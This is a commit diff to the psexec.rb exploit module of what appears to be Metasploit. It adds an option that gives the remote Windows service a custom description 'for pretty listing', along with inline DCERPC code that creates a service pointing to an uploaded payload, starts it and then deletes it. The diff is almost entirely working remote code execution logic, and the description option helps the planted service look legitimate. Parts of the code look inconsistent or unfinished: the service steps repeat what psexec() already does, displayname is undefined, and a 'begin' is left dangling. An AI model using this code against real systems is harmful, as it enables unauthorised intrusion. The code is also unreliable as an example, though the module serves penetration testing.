Custom Service Description

Florian Gaultier · Meatballs1 · commit 978bdbb67624 · 2014-04-02T20:33:07.000+01:00
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
@@ -80,7 +80,8 @@ def initialize(info = {})
         OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
         OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
         OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
-        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil])
+        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
       ], self.class)
   end
 
@@ -152,6 +153,7 @@ def exploit
       simple.disconnect("ADMIN$")
     else
       servicename = rand_text_alpha(8)
+      servicedescription = datastore['SERVICE_DESCRIPTION']
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")
@@ -199,6 +201,128 @@ def exploit
 
       psexec(file_location, false)
 
+      print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
+      stubdata =
+        scm_handle +
+        NDR.wstring(servicename) +
+        NDR.uwstring(displayname) +
+
+        NDR.long(0x0F01FF) + # Access: MAX
+        NDR.long(0x00000110) + # Type: Interactive, Own process
+        NDR.long(0x00000003) + # Start: Demand
+        NDR.long(0x00000000) + # Errors: Ignore
+        NDR.wstring( file_location  ) + # Binary Path
+        NDR.long(0) + # LoadOrderGroup
+        NDR.long(0) + # Dependencies
+        NDR.long(0) + # Service Start
+        NDR.long(0) + # Password
+        NDR.long(0) + # Password
+        NDR.long(0) + # Password
+        NDR.long(0)  # Password
+      begin
+        response = dcerpc.call(0x0c, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          svc_handle = dcerpc.last_response.stub_data[0,20]
+          svc_status = dcerpc.last_response.stub_data[24,4]
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      ##
+      # CloseHandle()
+      ##
+      print_status("Closing service handle...")
+      begin
+        response = dcerpc.call(0x0, svc_handle)
+      rescue ::Exception
+      end
+
+      ##
+      # OpenServiceW
+      ##
+      print_status("Opening service...")
+      begin
+        stubdata =
+          scm_handle +
+          NDR.wstring(servicename) +
+          NDR.long(0xF01FF)
+
+        response = dcerpc.call(0x10, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          svc_handle = dcerpc.last_response.stub_data[0,20]
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      if servicedescription
+        ##
+        # ChangeServiceConfig2W()
+        ##
+        print_status("Change the service description (#{servicedescription})...")
+        begin
+          stubdata =
+            svc_handle +
+            NDR.long(1) +
+            NDR.long(1) +
+            NDR.long(0x0200) +
+            NDR.long(0x04000200) +
+            NDR.wstring(servicedescription)
+
+          response = dcerpc.call(0x25, stubdata)
+          if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+          end
+        rescue ::Exception => e
+          print_error("Error: #{e}")
+        end
+      end
+
+      ##
+      # StartService()
+      ##
+      print_status("Starting the service...")
+      stubdata =
+        svc_handle +
+        NDR.long(0) +
+        NDR.long(0)
+      begin
+        response = dcerpc.call(0x13, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+        return
+      end
+
+      ##
+      # DeleteService()
+      ##
+      print_status("Removing the service...")
+      stubdata =
+        svc_handle
+      begin
+        response = dcerpc.call(0x02, stubdata)
+        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
+        end
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+      end
+
+      ##
+      # CloseHandle()
+      ##
+      print_status("Closing service handle...")
+      begin
+        response = dcerpc.call(0x0, svc_handle)
+      rescue ::Exception => e
+        print_error("Error: #{e}")
+      end
+
+      begin
+
       print_status("Deleting \\#{filename}...")
       sleep(1)
       #This is not really useful but will prevent double \\ on the wire :)
